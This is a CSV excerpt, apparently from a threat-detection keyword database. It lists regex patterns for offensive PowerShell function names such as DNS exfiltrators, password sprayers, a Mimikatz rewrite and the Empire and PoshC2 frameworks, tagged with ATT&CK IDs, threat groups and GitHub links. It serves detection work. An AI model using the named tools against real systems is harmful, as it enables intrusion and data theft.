Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","48960"
"*Invoke-DNSExfiltrator*",".{0,1000}Invoke\-DNSExfiltrator.{0,1000}","offensive_tool_keyword","DNSExfiltrator","DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.","T1041 - T1048","TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/Arno0x/DNSExfiltrator","1","1","N/A","N/A","10","9","867","188","2024-04-29T20:20:43Z","2017-12-20T13:58:09Z","48961"
"*Invoke-DNSteal*",".{0,1000}Invoke\-DNSteal.{0,1000}","offensive_tool_keyword","Invoke-DNSteal","DNS Data Exfiltrator","T1071.004 - T1041 - T1048","TA0011 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/JoelGMSec/Invoke-DNSteal","1","1","N/A","N/A","10","2","109","23","2023-07-17T11:26:19Z","2021-06-24T11:03:09Z","48962"
"*invoke-dnsupdate *",".{0,1000}invoke\-dnsupdate\s.{0,1000}","offensive_tool_keyword","KrbRelay-SMBServer","acts as an SMB server (instead of DCOM) to relay Kerberos AP-REQ to CIFS or HTTP","T1557 - T1021 - T1205 - T1071","TA0006 - TA0008 - TA0010","N/A","Black Basta","Lateral Movement","https://github.com/decoder-it/KrbRelay-SMBServer","1","0","N/A","N/A","9","3","215","26","2024-10-08T14:55:59Z","2024-10-05T12:28:55Z","48963"
"*Invoke-DNSUpdate.ps1*",".{0,1000}Invoke\-DNSUpdate\.ps1.{0,1000}","offensive_tool_keyword","Powermad","PowerShell MachineAccountQuota and DNS exploit tools","T1087 - T1098 - T1018 - T1046 - T1081","TA0007 - TA0006 - TA0005 - TA0001","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/Kevin-Robertson/Powermad","1","0","N/A","N/A","N/A","10","1303","181","2023-01-11T00:48:35Z","2017-09-05T18:34:03Z","48964"
"*Invoke-Dogz.ps1*",".{0,1000}Invoke\-Dogz\.ps1.{0,1000}","offensive_tool_keyword","mimidogz","Rewrite of Invoke-Mimikatz.ps1 to avoid AV detection","T1055 - T1560.001 - T1110.001 - T1003 - T1071","TA0005 - TA0040 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/projectb-temp/mimidogz","1","1","N/A","N/A","10","1","0","0","2019-02-11T10:14:10Z","2019-02-11T10:12:08Z","48965"
"*Invoke-DomainHarvest*",".{0,1000}Invoke\-DomainHarvest.{0,1000}","offensive_tool_keyword","MailSniper","Invoke-DomainHarvest* will attempt to connect to an * portal and determine a valid domain name for logging into the portal","T1087.003 - T1110.003 - T1114.002","TA0006 -TA0009 -TA0007","N/A","Leafminer","Reconnaissance","https://github.com/dafthack/MailSniper","1","1","N/A","N/A","N/A","10","3046","580","2024-08-07T18:11:58Z","2016-09-08T00:36:51Z","48966"
"*Invoke-DomainHarvestOWA*",".{0,1000}Invoke\-DomainHarvestOWA.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1087.003 - T1110.003 - T1114.002","TA0006 -TA0009 -TA0007","N/A","Leafminer","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","N/A","10","3046","580","2024-08-07T18:11:58Z","2016-09-08T00:36:51Z","48967"
"*Invoke-DomainPasswordSpray*",".{0,1000}Invoke\-DomainPasswordSpray.{0,1000}","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain.","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","1","N/A","N/A","10","10","1865","388","2024-07-11T18:18:57Z","2016-10-04T23:37:37Z","48968"
"*Invoke-DomainPasswordSpray*",".{0,1000}Invoke\-DomainPasswordSpray.{0,1000}","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain.","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","1","N/A","N/A","10","10","1865","388","2024-07-11T18:18:57Z","2016-10-04T23:37:37Z","48969"
"*Invoke-DomainPasswordSpray*",".{0,1000}Invoke\-DomainPasswordSpray.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","48970"
"*Invoke-DomainPasswordSpray*",".{0,1000}Invoke\-DomainPasswordSpray.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","48971"
"*Invoke-DOSfuscation*",".{0,1000}Invoke\-DOSfuscation.{0,1000}","offensive_tool_keyword","Invoke-DOSfuscation","Invoke-DOSfuscation is a PowerShell v2.0+ compatible cmd.exe command obfuscation framework. (White paper: https://www.fireeye.com/blog/threat-research/2018/03/dosfuscation-exploring-obfuscation-and-detection-techniques.html)","T1027 - T1140 - T1059","TA0002 - TA0003 - TA0040","N/A","N/A","Defense Evasion","https://github.com/danielbohannon/Invoke-DOSfuscation","1","1","N/A","N/A","N/A","9","880","139","2018-03-27T12:16:18Z","2018-03-19T16:47:54Z","48972"
"*Invoke-DowngradeAccount*",".{0,1000}Invoke\-DowngradeAccount.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","48973"
"*Invoke-DownloadFile *",".{0,1000}Invoke\-DownloadFile\s.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","48974"
"*Invoke-DownloadFile.ps1*",".{0,1000}Invoke\-DownloadFile\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","48975"
"*Invoke-DpapiDump*",".{0,1000}Invoke\-DpapiDump.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","48976"
"*Invoke-DriveFileDownload*",".{0,1000}Invoke\-DriveFileDownload.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","Has the ability to download single files from SharePoint and OneDrive as the current user","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","48977"
"*Invoke-DriveFileDownload*",".{0,1000}Invoke\-DriveFileDownload.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","48978"
"*Invoke-DriverCoInstallersCheck*",".{0,1000}Invoke\-DriverCoInstallersCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","48979"
"*Invoke-DropboxUpload*",".{0,1000}Invoke\-DropboxUpload.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","48980"
"*Invoke-DumpApps*",".{0,1000}Invoke\-DumpApps.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","Gets app registrations and external enterprise apps along with consent and scope info","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","48981"
"*Invoke-DumpCAPS*",".{0,1000}Invoke\-DumpCAPS.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","Gets conditional access policies","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","48982"
"*Invoke-DumpMDEConfig*",".{0,1000}Invoke\-DumpMDEConfig.{0,1000}","offensive_tool_keyword","Invoke-DumpMDEConfig","PowerShell script to dump Microsoft Defender Config, protection history and Exploit Guard Protection History (no admin privileges required )","T1518 - T1082 - T1005","TA0009 - TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/BlackSnufkin/Invoke-DumpMDEConfig","1","1","N/A","N/A","9","2","147","23","2024-06-10T14:00:47Z","2024-06-09T15:11:16Z","48983"
"*Invoke-DumpOWAMailboxViaMSGraphApi*",".{0,1000}Invoke\-DumpOWAMailboxViaMSGraphApi.{0,1000}","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","6","7","652","105","2024-12-06T15:51:42Z","2021-07-08T02:28:12Z","48984"
"*invoke-edrchecker*",".{0,1000}invoke\-edrchecker.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","48985"
"*Invoke-EDRChecker*",".{0,1000}Invoke\-EDRChecker.{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","1","N/A","N/A","8","8","706","98","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z","48986"
"*Invoke-EDRChecker.ps1*",".{0,1000}Invoke\-EDRChecker\.ps1.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","48987"
"*Invoke-EgressCheck*",".{0,1000}Invoke\-EgressCheck.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-EgressCheck.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","48988"
"*Invoke-EgressCheck.ps1*",".{0,1000}Invoke\-EgressCheck\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1141","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","48989"
"*Invoke-Empire -Servers*",".{0,1000}Invoke\-Empire\s\-Servers.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","48990"
"*Invoke-Empire*",".{0,1000}Invoke\-Empire.{0,1000}","offensive_tool_keyword","empire","empire function name of agent.ps1. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","48991"
"*Invoke-EndpointProtectionCheck*",".{0,1000}Invoke\-EndpointProtectionCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","48992"
"*Invoke-EnumerateAzureBlobs.ps1*",".{0,1000}Invoke\-EnumerateAzureBlobs\.ps1.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","Scattered Spider*","Exploitation tool","https://github.com/NetSPI/MicroBurst","1","1","N/A","N/A","6","10","2143","320","2025-03-19T17:07:24Z","2018-07-16T16:47:20Z","48993"
"*Invoke-EnumerateAzureSubDomains.ps1*",".{0,1000}Invoke\-EnumerateAzureSubDomains\.ps1.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","Scattered Spider*","Exploitation tool","https://github.com/NetSPI/MicroBurst","1","1","N/A","N/A","6","10","2143","320","2025-03-19T17:07:24Z","2018-07-16T16:47:20Z","48994"
"*invokeenumeratelocaladmin*",".{0,1000}invokeenumeratelocaladmin.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","N/A","10","10","67","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z","48996"
